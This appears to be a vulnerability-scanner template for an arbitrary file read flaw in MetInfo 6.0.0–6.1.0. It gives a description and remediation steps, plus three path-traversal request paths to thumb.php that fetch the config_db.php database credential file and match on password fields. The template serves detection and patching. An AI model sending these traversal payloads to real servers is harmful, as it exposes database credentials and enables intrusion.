id: metinfo-lfi
info:
  name: MetInfo 6.0.0/6.1.0 LFI
  author:
  - l0ne1y
  tags:
  - metinfo
  - lfi
  description: |-
    Metinfo 6.0.0/6.1.0 arbitrary file read vulnerability.
    metinfo is a website-building CMS developed with PHP and Mysql. Versions 6.0.0-6.1.0 of this CMS have an arbitrary file read vulnerability. An attacker can exploit it to read any sensitive file on the target server.
  reference:
  - https://paper.seebug.org/676/
  severity: high
  remediation: |-
    Official Fix:
    1. It is recommended that users obtain the latest patch or the latest version from the official site: https://www.metinfo.cn

    Temporary Fix:
    1. Filter ".", preventing users from traversing to parent directories in the URL.
    2. Use strict regular-expression validation of user-input parameter formats. Hard-code or uniformly encode filename parameters passed by the user, use a whitelist for file types, and reject parameters containing malicious or null characters.
    3. Disable directory traversal services; for example, configure open_basedir in php.ini to restrict file access scope.
    4. Store file paths in the database and let users download files by submitting the corresponding file ID.
    5. Verify permissions before allowing a user to download a file.
requests:
- matchers:
  - type: word
    condition: and
    part: body
    words:
    - con_db_pass
    - con_db_name
  - type: status
    status:
    - 200
  matchers-condition: and
  path:
  - '{{BaseURL}}/include/thumb.php?dir=http/.....///.....///config/config_db.php'
  - '{{BaseURL}}/include/thumb.php?dir=.....///http/.....///config/config_db.php'
  - '{{BaseURL}}/include/thumb.php?dir=http\\..\\..\\config\\config_db.php'
  method: GET
  stop-at-first-match: true
